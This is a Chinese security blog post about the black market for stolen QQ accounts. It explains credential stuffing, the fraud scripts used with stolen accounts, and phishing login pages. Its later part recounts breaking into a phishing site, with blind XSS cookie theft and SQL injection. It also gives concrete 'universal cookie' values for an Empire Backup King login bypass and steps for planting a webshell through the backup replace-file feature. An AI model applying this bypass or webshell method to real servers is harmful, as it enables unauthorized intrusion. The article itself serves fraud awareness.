起底盗号背后的黑色产业链

🔰0x01 前言

    在近十年来，盗号问题层出不穷，相信大家多多少少经历过被盗号或者身边的人被盗号，今天就带大家起底盗号背后的黑色产业链！

🔰0x02 模式

    在不法分子盗取QQ号后，一般来说主要有三个用途

✅涉黄

✅涉赌

✅涉诈

在这三个暴利的灰色产业链驱使下，衍生出了这一黑色产业

🔰0x03 分析

    2022年5月-6月，发生了一场大规模的盗号事件，该犯罪团伙利用盗来的QQ号批量给好友，QQ群发送涉黄涉赌的信息。在当天，我就对此次攻击行为做出研判。

🔰0x04 研判结果

    外界还是有不少谣言说是通过腾讯的什么漏洞盗号，或者什么未授权获得加密key进行批量发信，其实这些可信度极低。我的研判结果是'撞库'！

    为何得出结论是撞库呢？因为我事后询问了多人是否长期未改过QQ密码？得到的答案都是一致的，这也证实了我的猜想。

🔰0x05 什么是撞库

    就是使用外界泄露的数据，跟你的QQ号密码进行匹配，如果账号密码一致，就成功登入了你的QQ。

    假设某某数据库泄露了邮箱跟密码，黑色产业链的人先是提取了由QQ邮箱作为注册邮箱的账号，把QQ号提取出来，和泄露的密码进行匹配

🔰0x06 犯罪模式

    最开始讲过盗号的三个常见犯罪模式，涉黄，涉赌，都很好理解，这里主要讲一下涉诈。涉诈一般分为这几种套路

✅假扮亲朋好友，XXX出事，在医院急需用钱

✅微信支付宝换钱，制作假的银行卡转账截图

✅假扮熟人借钱

🔰0x07 钓鱼式盗号

    近年来被撞库的号已经不满足于黑色产业链，于是发展出了钓鱼式盗号。这是一个被盗号的学生发在自己班级群、校友群的盗号信息截图

🔰0x08 裂变

    假设犯罪团伙手上有100个被盗的QQ，经过钓鱼式盗号，进行裂变，一生百，百生千。用100个QQ号可裂变为盗走成千上万个号。

🔰0x09 深挖钓鱼式盗号

    首先，扫描盗号二维码，出现了一个登录页，足够以假乱真的登录页。

    登录后，需要填写个人信息（为接下来的涉诈环节做铺垫）

🔰0x10 开端

通过特殊手段，拿到了盗号网站源码，进行代码审计

这时候发现盲打的XSS有了回弹，管理员登入后打到了cookie

这时候也顺利进入后台

尝试上传点后，以失败告终

转战源码这块

后台多处注入，但是权限不足，无法拿shell

🔰0x10 获取权限

在源码里，翻到一个帝国备份王，根据经验，这帝国备份王可以通过万能cookie进入，于是尝试使用万能cookie

ebak_loginebakckpass:119770adb578053dcb383f67a81bcbc6 ebak_bakrnd:35y5cCnnA4Kh ebak_bakusername:admin ebak_baklogintime:4070883661

成功进入后台后，准备拿服务器权限

1.本地起一个mysql服务，在网站连接

2.点击备份

3.这里填写你备份的名称，也就是等下连接webshell用的

4.点击管理备份-替换文件

?>替换成?><? webshell ?>

webshell路径：

http://127.0.0.1/config/sbak/bdata/备份设置的文件名/config.php

成功获取服务器权限

取证后交由衙门

🔰0x10 尾声

    上面拿盗号服务器的过程文章，是我22年年初和土司兄弟一起完成的。后来不知道怎么就出现在了各个公众号。最近开了自己的公众号，也就再发一次。

🔰0x11 警示

    了解了盗号的套路后，可以分享给亲朋好友看一下，谨防上当受骗。文章内容仅供学习，使用技术做任何违法犯罪行为由自己承担法律责任。

原文始发于微信公众号（安全社）：起底盗号背后的黑色产业链